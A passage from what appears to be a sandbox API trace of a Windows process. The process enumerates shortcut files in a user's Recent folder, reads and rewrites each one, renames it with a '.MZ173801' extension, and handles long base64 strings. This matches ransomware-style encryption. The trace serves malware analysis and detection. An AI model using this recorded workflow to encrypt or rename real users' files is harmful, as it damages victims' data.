lpUsedDefaultChar=0x0) returned 814 [0106.619] GetCurrentThreadId () returned 0x1358 [0106.619] GetCurrentThreadId () returned 0x1358 [0106.619] GetCurrentThreadId () returned 0x1358 [0106.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3067xe8riKxNNoH.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\3067xe8rikxnnoh.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.619] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.619] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.619] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x32f [0106.620] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.620] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x32f, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x32f, lpOverlapped=0x0) returned 1 [0106.621] CloseHandle (hObject=0x3f4) returned 1 [0106.621] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3067xe8riKxNNoH.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\3067xe8rikxnnoh.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.622] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x32f, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x32f, lpOverlapped=0x0) returned 1 [0106.623] CloseHandle (hObject=0x3f4) returned 1 [0106.624] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3067xe8riKxNNoH.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\3067xe8rikxnnoh.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3067xe8riKxNNoH.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\3067xe8rikxnnoh.lnk.mz173801")) returned 1 [0106.624] GetCurrentThreadId () returned 0x1358 [0106.624] GetCurrentThreadId () returned 0x1358 [0106.624] GetCurrentThreadId () returned 0x1358 [0106.624] GetCurrentThreadId () returned 0x1358 [0106.624] GetCurrentThreadId () returned 0x1358 [0106.624] GetCurrentThreadId () returned 0x1358 [0106.624] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3b904a, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xecf289d4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xecf289d4, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x413, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="3MH4hI_B2Y4fI4Q-s4O.lnk", cAlternateFileName="3MH4HI~1.LNK")) returned 1 [0106.624] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.624] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.624] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3MH4hI_B2Y4fI4Q-s4O.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\3mh4hi_b2y4fi4q-s4o.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3b904a, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xecf289d4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xecf289d4, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x413)) returned 1 [0106.625] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.625] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.625] GetCurrentThreadId () returned 0x1358 [0106.625] GetCurrentThreadId () returned 0x1358 [0106.625] GetCurrentThreadId () returned 0x1358 [0106.625] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.626] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.626] GetCurrentThreadId () returned 0x1358 [0106.626] GetCurrentThreadId () returned 0x1358 [0106.626] GetCurrentThreadId () returned 0x1358 [0106.626] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3MH4hI_B2Y4fI4Q-s4O.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\3mh4hi_b2y4fi4q-s4o.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.626] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.626] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.626] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x413 [0106.626] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.626] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x413, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x413, lpOverlapped=0x0) returned 1 [0106.627] CloseHandle (hObject=0x3f4) returned 1 [0106.627] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3MH4hI_B2Y4fI4Q-s4O.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\3mh4hi_b2y4fi4q-s4o.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.628] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x413, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x413, lpOverlapped=0x0) returned 1 [0106.629] CloseHandle (hObject=0x3f4) returned 1 [0106.634] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3MH4hI_B2Y4fI4Q-s4O.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\3mh4hi_b2y4fi4q-s4o.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3MH4hI_B2Y4fI4Q-s4O.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\3mh4hi_b2y4fi4q-s4o.lnk.mz173801")) returned 1 [0106.635] GetCurrentThreadId () returned 0x1358 [0106.635] GetCurrentThreadId () returned 0x1358 [0106.635] GetCurrentThreadId () returned 0x1358 [0106.635] GetCurrentThreadId () returned 0x1358 [0106.635] GetCurrentThreadId () returned 0x1358 [0106.635] GetCurrentThreadId () returned 0x1358 [0106.635] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9940cd4, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9940cd4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9940cd4, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3e9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="4DBo0atmEpeC-LN5J.lnk", cAlternateFileName="4DBO0A~1.LNK")) returned 1 [0106.635] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.635] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.635] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4DBo0atmEpeC-LN5J.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\4dbo0atmepec-ln5j.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9940cd4, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9940cd4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9940cd4, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3e9)) returned 1 [0106.636] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.636] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.636] GetCurrentThreadId () returned 0x1358 [0106.636] GetCurrentThreadId () returned 0x1358 [0106.636] GetCurrentThreadId () returned 0x1358 [0106.637] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.637] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 